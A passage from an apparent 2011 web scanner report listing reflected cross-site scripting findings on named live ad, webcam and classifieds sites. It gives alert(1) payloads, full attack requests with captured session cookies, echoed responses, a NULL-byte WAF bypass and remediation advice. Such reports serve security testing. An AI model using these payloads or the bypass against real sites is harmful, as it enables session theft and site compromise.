if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='';var zzCu ...[SNIP]... DYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/132e9';alert(1)//cb504a93756"> ...[SNIP]...
4.246. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c7.zedo.com
Path:
/bar/v16-401/c5/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b427'-alert(1)-'52c0c108d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?2b427'-alert(1)-'52c0c108d3d=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 986 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=552 Expires: Fri, 28 Jan 2011 16:54:00 GMT Date: Fri, 28 Jan 2011 16:44:48 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd9d'%3balert(1)//443920a6ea7 was submitted in the q parameter. This input was echoed as 6dd9d';alert(1)//443920a6ea7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=43 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:07 GMT Connection: close Content-Length: 1928
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='6dd9d';alert(1)//443920a6ea7';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=6dd9d';alert(1)//443920a6ea7;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8120d"%3balert(1)//0d14a65187a was submitted in the q parameter. This input was echoed as 8120d";alert(1)//0d14a65187a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=43 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:07 GMT Connection: close Content-Length: 1928
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='8120d";alert(1)//0d14a65187a';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=8120d";alert(1)//0d14a65187a;z="+Math.random();}
var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math. ...[SNIP]...
4.249. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cafr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:45:06 GMT Connection: close Content-Length: 22643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA"> ...[SNIP]...
4.250. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cafr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00d05ee"><script>alert(1)</script>a1533097529~1');return false;"> ...[SNIP]...
4.251. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cafr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:02 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:03 GMT Connection: close Content-Length: 8309 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
4.256. http://cbs6albany.oodle.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cbs6albany.oodle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba1c"><script>alert(1)</script>0fdede783fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2ba1c"><script>alert(1)</script>0fdede783fa=1 HTTP/1.1 Host: cbs6albany.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 29 Jan 2011 05:24:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: otu=980e86cbd3ae2db21de9f81835b23291; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=bca0eed19e9a8884cb1df9b5e717aa78; path=/; domain=.oodle.com Set-Cookie: a=dT1DM0VBNTdFQTRENDNBNDlE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2ODU7fQ%3D%3D; path=/; domain=.oodle.com Content-Length: 101695
The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 8e802<script>alert(1)</script>af386fa2d18 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/tools/load.php?js=8e802<script>alert(1)</script>af386fa2d18 HTTP/1.1 Host: common.cdn.onset.freedom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:25:25 GMT Server: Apache Last-Modified: Sat, 29 Jan 2011 05:25:25 GMT ETag: "00a3ec14ebd9f96044f83e5dfc16d618-109" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 05:25:25 GMT Vary: Accept-Encoding,User-Agent Content-Length: 109 Connection: close Content-Type: text/javascript
The value of the js request parameter is copied into a JavaScript inline comment. The payload fda89*/alert(1)//e73e572f888 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/tools/load.php?js=common_fi_oas,common_dartadsfda89*/alert(1)//e73e572f888 HTTP/1.1 Host: common.cdn.onset.freedom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:25:26 GMT Server: Apache Last-Modified: Sat, 29 Jan 2011 05:25:26 GMT ETag: "8a178484d3c6868d439736284bcc5571-559" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 05:25:26 GMT Vary: Accept-Encoding,User-Agent Content-Length: 559 Connection: close Content-Type: text/javascript
4.259. http://common.cdn.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.cdn.onset.freedom.com
Path:
/common/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 5b511*/alert(1)//685b93a954a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/tools/load.php?js=common_fi_oas,common_dartads&5b511*/alert(1)//685b93a954a=1 HTTP/1.1 Host: common.cdn.onset.freedom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:25:30 GMT Server: Apache Last-Modified: Sat, 29 Jan 2011 05:25:32 GMT ETag: "e234251c50093aaa4ccfc19dd9d0ec18-19869" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 05:25:30 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/javascript Content-Length: 19869
The value of the js request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>2971a6c9080 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/tools/load.php?js=da001<script>alert(1)</script>2971a6c9080 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:24 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n23 ( iad-agg-n36), ms iad-agg-n36 ( sfo-agg-n40), ms sfo-agg-n40 ( origin) ETag: "64016ad15df0065368a6076b7710a50f-109" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 01:59:25 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Sat, 29 Jan 2011 01:59:25 GMT Connection: keep-alive Content-Length: 109
The value of the js request parameter is copied into a JavaScript inline comment. The payload c74d3*/alert(1)//5adca407e2b was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/tools/load.php?js=common_fi_oas,common_dartadsc74d3*/alert(1)//5adca407e2b HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:28 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n23 ( iad-agg-n22), ms iad-agg-n22 ( sfo-agg-n18), ms sfo-agg-n18 ( origin) ETag: "0b4514c6e4844bf90b5c34cdfa6ee0ea-559" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 01:59:28 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Sat, 29 Jan 2011 01:59:28 GMT Connection: keep-alive Content-Length: 559
4.262. http://common.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.onset.freedom.com
Path:
/common/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 7ef4d*/alert(1)//802d53a8b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/tools/load.php?js=common_fi_oas,common_dartads&7ef4d*/alert(1)//802d53a8b73=1 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:42 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n23 ( iad-agg-n30), ms iad-agg-n30 ( sfo-agg-n43), ms sfo-agg-n43 ( origin) ETag: "c700a66bce50da8b94779fc293894c44-19869" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 01:59:42 GMT Age: 1 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Sat, 29 Jan 2011 01:59:43 GMT Connection: keep-alive Content-Length: 19869
The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5bfe"%3b8c2adbfec8b was submitted in the REST URL parameter 10. This input was echoed as d5bfe";8c2adbfec8b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: application/x-javascript X-Varnish: 2884312773 Cache-Control: max-age=2591981 Expires: Mon, 28 Feb 2011 01:59:12 GMT Date: Sat, 29 Jan 2011 01:59:31 GMT Connection: close Content-Length: 4711
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd =='undefined'){var zzIdxTrd ='';} el ...[SNIP]... ar zzIdxClk =''; } else { zzIdxClk = 'se=' + zzIdxClk;} if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }
